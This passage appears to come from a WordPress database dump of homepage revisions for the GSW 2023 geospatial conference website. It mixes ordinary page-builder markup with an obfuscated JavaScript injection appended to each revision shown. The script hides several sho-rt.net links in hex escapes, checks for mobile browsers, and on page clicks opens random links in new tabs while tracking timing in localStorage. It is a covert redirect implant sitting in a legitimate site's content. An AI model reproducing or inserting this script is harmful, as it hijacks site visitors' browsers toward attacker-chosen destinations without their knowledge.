_0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-09 16:15:51','2022-11-09 16:15:51','',3066,'https://gsw2023.com/?p=3155',0,'revision','',0),
(3156,1,'2022-11-09 16:16:41','2022-11-09 16:16:41','[vc_row css=\".vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text]\r\n<h3>EGYPT GSW\'2023</h3>\r\n<h3>The First Geospatial Week in Africa and The Middle East</h3>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\" css=\".vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010595771{margin-top: 10px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#3724e5\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1667948825977{margin-top: 25px !important;}\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3082\" img_size=\"799x452\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"5\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^2275|url^https://gsw2023.com/wp-content/uploads/2022/10/aast32.jpg|caption^null|alt^null|title^aast32|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668010285886{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][vc_column][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-09 16:16:41','2022-11-09 16:16:41','',3066,'https://gsw2023.com/?p=3156',0,'revision','',0),
(3157,1,'2022-11-09 16:17:45','2022-11-09 16:17:45','[vc_row css=\".vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text]\r\n<h3>EGYPT GSW\'2023</h3>\r\n<h3>The First Geospatial Week in Africa and The Middle East</h3>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\" css=\".vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010661475{margin-top: 25px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#3724e5\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1667948825977{margin-top: 25px !important;}\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3082\" img_size=\"799x452\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"5\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^2275|url^https://gsw2023.com/wp-content/uploads/2022/10/aast32.jpg|caption^null|alt^null|title^aast32|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668010285886{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][vc_column][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 